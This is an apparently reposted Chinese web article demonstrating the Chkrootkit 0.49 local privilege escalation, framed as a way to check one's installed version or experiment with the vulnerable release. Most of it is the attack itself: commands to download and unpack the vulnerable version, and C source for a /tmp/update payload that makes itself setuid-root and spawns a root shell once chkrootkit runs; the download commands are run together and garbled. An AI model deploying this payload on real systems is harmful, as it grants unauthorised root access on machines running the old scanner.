安全漏洞:Chkrootkit 0.49 本地提权漏洞的测试方法

页面导航:首页 > 网络 > 网络其他 > 安全漏洞:Chkrootkit 0.49 本地提权漏洞的测试方法

安全漏洞:Chkrootkit 0.49 本地提权漏洞的测试方法

来源: 作者: 时间:2015-10-04 14:00 【

这篇文章主要为大家介绍了查看自己的Chkrootkit 0.49安装的是不是升到最新版了,或者下载有漏洞的版本进行实验,感兴趣的朋友可以和脚本之家的小编一起来看一下

  Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:

  可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:

  wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/

  ./chkrootkit -V

  普通用户在 /tmp 目录下新建 update.c(代码实示例如下):

  #include <unistd.h>

  void main(void)

  {

  system("chown root:root /tmp/update");

  system("chmod 4755 /tmp/update");

  setuid(0);

  setgid(0);

  execl("/bin/sh","sh",NULL);

  }

  然后编译好 update ,看下update的文件详情:

  

  执行有漏洞的 chkrootkit :

  

  再来看下 update 已经成功属于 root 组了!

  

  以上就是查看自己 Ckrootkit 0.49 是不是安装的是不是升到最新版了,或者下载有漏洞的版本进行实验的步骤,谢谢阅读,希望能帮到大家,请继续关注脚本宝典,我们会努力分享更多优秀的文章。

Tags:

文章评论

最 近 更 新
热 点 排 行
Js与CSS工具
代码转换工具

<